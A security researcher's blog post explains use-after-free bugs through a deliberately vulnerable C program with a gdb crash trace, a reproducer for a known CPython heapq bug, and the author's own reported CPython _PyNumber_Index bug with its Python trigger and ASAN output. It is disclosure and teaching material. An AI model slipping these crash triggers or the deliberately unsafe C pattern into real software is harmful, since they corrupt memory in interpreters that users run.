Use-after-free: a CPython case study
In this blogpost we’ll be examining a vulnerability class knowns as use-after-free (UaF). We will be describing what use-after-free is, how one might get to code execution and then provide a toy example that I discovered personally, in Python.
Introduction to use-after-free
A use-after-free (UaF) vulnerability is a memory corruption vulnerability in which memory is used after being freed, i.e., a program accesses a memory after its lifetime has ended, and the allocator may legally reuse the memory for other purposes. In userspace, we commonly use malloc and free to allocate and free memory. The heap allocator is not allowed to allocate new objects for chunks returned from …
Use-after-free: a CPython case study
In this blogpost we’ll be examining a vulnerability class knowns as use-after-free (UaF). We will be describing what use-after-free is, how one might get to code execution and then provide a toy example that I discovered personally, in Python.
Introduction to use-after-free
A use-after-free (UaF) vulnerability is a memory corruption vulnerability in which memory is used after being freed, i.e., a program accesses a memory after its lifetime has ended, and the allocator may legally reuse the memory for other purposes.
In userspace, we commonly use malloc and free to allocate and free memory.
The heap allocator is not allowed to allocate new objects for chunks returned from malloc since they’re supposed to be used by the program.
However, after a free, the allocator can use the freed chunk for a corresponding allocation.
If this happens but the chunk that was freed by the program is somehow still used, then interesting things could happen - that could result in memory execution, memory reads or memory writes.
As an example, let us consider the following C code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
typedef struct _user_t {
char name[16];
void (*print)(const char*);
} user_t;
static
void
print_user(
const char* name
)
{
printf("User: %s\n", name);
}
int
main()
{
user_t* u = NULL;
// Allocate a new user with the constant name "Julian"
u = malloc(sizeof(*u));
(void)strcpy(u->name, "Julian");
u->print = print_user;
// Free the user
free(u);
// Allocate some other unrelated buffer
char* evil = malloc(sizeof(user_t));
read(0, evil, sizeof(user_t));
// Greet user
printf("Greeting user...\n");
u->print(u->name);
// Free unrelated buffer
free(evil);
// Return
return 0;
}
- In this code, we have an object type (this might look more natural in C++ but still used a lot in production-level C code) called
user_twhich represents a user. - The
user_ttype has a name (let’s ignore names longer than 15 bytes plus NUL terminator for now) and a function pointer for printing the user’s name. - In the
mainfunction, we allocate a new useru, set its name and its function pointer to be a legitimate printing function. - Then, we free the user. From the allocator’s perspective, from this point on - the chunk that was previously allocated could be reused, i.e. if the address of
uwas0x12345678, afterfree, the next time someone callsmallocthe allocator might return0x12345678. - Indeed, we allocate a new buffer called
evil. Noteevilis not a user - it’s simply a buffer with the same size. I made it very artificial here (by usingsizeof(user_t)) but normally you’d see something completely unrelated (think ofmalloc(24)for example). At that point, not only can the allocator return0x12345678, it’s kind of encouraged to do so, to avoid fragmentation. Thus,evilgets the same address asu, and they point to the same memory chunk! - User can write arbitrary bytes to
evil, which also sets bytes tousince they point at the same chunk. That means they can override the name of the user, and also, more importantly, the function pointer!
If we run it we’ll get a crash. Let’s run it under a debugger and provide AAAAAAAAAAAAAAAAAAAAAAAAA as the input:
bo@ipa:/tmp/uaf$ gdb ./uaf
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04.2) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./uaf...
(No debugging symbols found in ./uaf)
(gdb) run
Starting program: /tmp/uaf/uaf
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
AAAAAAAAAAAAAAAAAAAAAAAA
Greeting user...
Program received signal SIGSEGV, Segmentation fault.
0x000055555555528a in main ()
(gdb)
(gdb) x/i $rip
=> 0x55555555528a <main+147>: call rdx
(gdb) p/x $rdx
$1 = 0x4141414141414141
(gdb)
Note the indirect jump (call rdx) which is typical of function pointers, and how rdx is completely attacker-controlled - 0x4141414141414141 is AAAAAAAA.
Of course, a real exploit would have to deal with technologies like ASLR which I have described in a past blogpost, but I hope this example illustrates the dangers of a use-after-free bug.
A remark regarding CFI
Besides ASLR, modern systems employ Control Flow Integrity (CFI) solutions that treat indirect calls like our call rdx with special care. For example, you might see in compiled C code a special instruction endbr64, which specifies that this address is a valid destination for a call instruction, and is being used by Intel’s "shadow stack" as part of their CFI, which is called Control-flow Enforcement Technology (CET).
Another example is how on Windows you have a technology called Control Flow Graph (CFG) that maps allowed destinations in a bitmap.
For now, I’d like to ignore those technologies to keep the discussion in this blogpost brief, but those technologies must be taken into account when developing a real exploit.
Python - motivation
I have a personal list of "things to look at", and a Python use-after-free was on that list.
Honestly, I was just inspired by CVE-2022-48560. You can read about it here, but in essence, it involved reference counting and callbacks.
In CPython (which is the C implementation of the Python programming language), objects have a reference counts. The idea behind reference counting is simple - every time an object is referenced, we increase a count by one, and every time a function finishes referencing an object - we decrease that number by one. When an object’s reference count hits zero - we free it.
Here’s how it looks like in CPython under Include/object.h (after some cleaning-up):
#define PyObject_HEAD PyObject ob_base;
...
struct _object {
Py_ssize_t ob_refcnt;
PyTypeObject *ob_type;
};
This is the base of all Python objects - it has a reference count and a type. You’d see in the source code many Python objects using PyObject_HEAD, which is the same really.
As an experiment, here’s some Python code that shows the reference count and how it changes over time:
#!/usr/bin/env python3
import ctypes
class C(object):
pass
a = C()
addr = id(a)
refcnt = ctypes.c_ssize_t.from_address(addr).value
print(f'Refcount: {refcnt}')
b = a
refcnt = ctypes.c_ssize_t.from_address(addr).value
print(f'Refcount: {refcnt}')
Note that the output is going to be 1 and then 2 - because we added another variable called b which points to the same address as a.
Of course, CPython code itself also uses reference counting - for example, when a function is going to use an object, it increases the reference count, and then decreases when it’s done.
In CVE-2022-48560, the issue is in the heapq module in the heappushpop function, and here’s the vulnerable code (prior to the fix):
cmp = PyObject_RichCompareBool(PyList_GET_ITEM(heap, 0), item, Py_LT);
if (cmp < 0)
return NULL;
if (cmp == 0) {
Py_INCREF(item);
return item;
}
The function calls a comparison operator between heap[0] and item, using the LT (less-than) operator.
This, in turn, might call a custom Python function __lt__, which might free the heap, resulting in a use-after-free, since a reference was never taken on the heap variable prior to the comparison!
Here’s the Python code that reproduces the issue:
import heapq
class h(int):
def __lt__(self, o):
list1.clear()
return NotImplemented
list1 = []
heapq.heappush(list1, h(0))
heapq.heappushpop(list1, 1)
Note the custom __lt__ method, which clears the heap. Reference for list1 was never taken prior to calling __lt__ and thes it’s freed after the comparison.
Thus, I was looking for something similar - custom callbacks that might free an object which might be referenced later.
My find
I found this issue on the night of January 15th, 2026, and reported it on January 16th, 2026.
The issue can be seen in the _PyNumber_Index method in Object/abstract.c:
PyObject *
_PyNumber_Index(PyObject *item)
{
if (item == NULL) {
return null_error();
}
if (PyLong_Check(item)) {
return Py_NewRef(item);
}
if (!_PyIndex_Check(item)) {
PyErr_Format(PyExc_TypeError,
"'%.200s' object cannot be interpreted "
"as an integer", Py_TYPE(item)->tp_name);
return NULL;
}
PyObject *result = Py_TYPE(item)->tp_as_number->nb_index(item);
if (!result || PyLong_CheckExact(result)) {
return result;
}
if (!PyLong_Check(result)) {
PyErr_Format(PyExc_TypeError,
"%T.__index__() must return an int, not %T",
item, result);
Py_DECREF(result);
return NULL;
}
// ... similar pattern continues
}
Let’s analyze it together:
- The item in
_PyNumber_Indexis aPyObject*and is a borrowed reference, which is a Python terminology to an object that this function does not own - you are not allowed (by convension) to decrease its reference count and it’s only guaranteed to be valid while the owner keeps it alive. - After some checks, we call the
nb_indexfunction, which is really a function pointer that ends up with a custom__index__callback, similar to how__lt__can be customized. - There is later a check that the result is exactly an integer and not a subclass (
PyLong_CheckExact). If it’s not then we format an error - and that error references the item. That’s the exact issue - my goal is freeing theitemduring my callback.
The gist: _PyNumber_Index implicitly assumes that item remains alive across the nb_index call, but that assumption is invalid because arbitrary Python code may run and drop the last reference.
So, I decided to compile CPython with ASAN (Address Sanitizer), which can be conveniently done with ./configure --with-address-sanitizer, and created the following code:
import array
class Evil:
def __init__(self, lst):
self.lst = lst
def __index__(self):
self.lst.clear()
return "not an int"
lst = []
e = Evil(lst)
lst.append(e)
del e
arr = array.array('I')
arr.fromlist(lst)
The interesting part lives in the Evil class - the __index__ method clears a list in the instance and returns something which is not an integer, triggering the vulnerability. At this point, that array (lst) is cleared.
To trigger it, I create the lst with an Evil instance and then delete the e reference, which means the only reference the the Evil instance is saved in lst. Since I release that list in __index__, the CPython’s code for item (which is the Evil instance) is already cleared since there are no references to it.
Here’s the output with a Python ASAN turned on:
==73525==ERROR: AddressSanitizer: heap-use-after-free on address 0x6130000300b8 at pc 0x0001013458a4 bp 0x00016ee396f0 sp 0x00016ee396e8
READ of size 8 at 0x6130000300b8 thread T0
#0 0x0001013458a0 in unicode_from_format unicodeobject.c:3075
#1 0x0001013436a8 in PyUnicode_FromFormatV unicodeobject.c:3109
#2 0x00010154d5c8 in PyErr_Format errors.c:1243
#3 0x0001010fe4e8 in _PyNumber_Index abstract.c:1433
#4 0x000109338334 in II_setitem arraymodule.c:411
#5 0x0001093427d4 in array_array_fromlist arraymodule.c.h:495
#6 0x00010114aeb0 in _PyObject_VectorcallTstate pycore_call.h:136
#7 0x0001014828ac in _Py_VectorCallInstrumentation_StackRefSteal ceval.c:1094
#8 0x0001014b4718 in _PyEval_EvalFrameDefault generated_cases.c.h:1785
#9 0x00010148180c in _PyEval_Vector ceval.c:2516
#10 0x00010148105c in PyEval_EvalCode ceval.c:1005
#11 0x000101646118 in run_mod pythonrun.c:1469
#12 0x00010163e6a0 in _PyRun_SimpleFileObject pythonrun.c:518
#13 0x00010163da30 in _PyRun_AnyFileObject pythonrun.c:81
#14 0x0001016ac948 in pymain_run_file main.c:429
#15 0x0001016aabcc in Py_RunMain main.c:772
#16 0x0001016ab9fc in pymain_main main.c:802
#17 0x0001016abba8 in Py_BytesMain main.c:826
#18 0x00019e4edd50 (<unknown module>)
When I reported the issue I also reported similar issues in PyFloat_AsDouble and PyNumber_Long, all leading to the same pattern.
Summary
In this blogpost I showed what use-after-free is (without getting to full exploitation) and shared a toy-example I discovered in CPython. I hope that this demonstrates how dangerous custom callbacks are - and, in fact, many browser exploits that focus on JavaScript do those tricks exactly to get to arbitrary code execution.
Stay tuned!
Jonathan Bar Or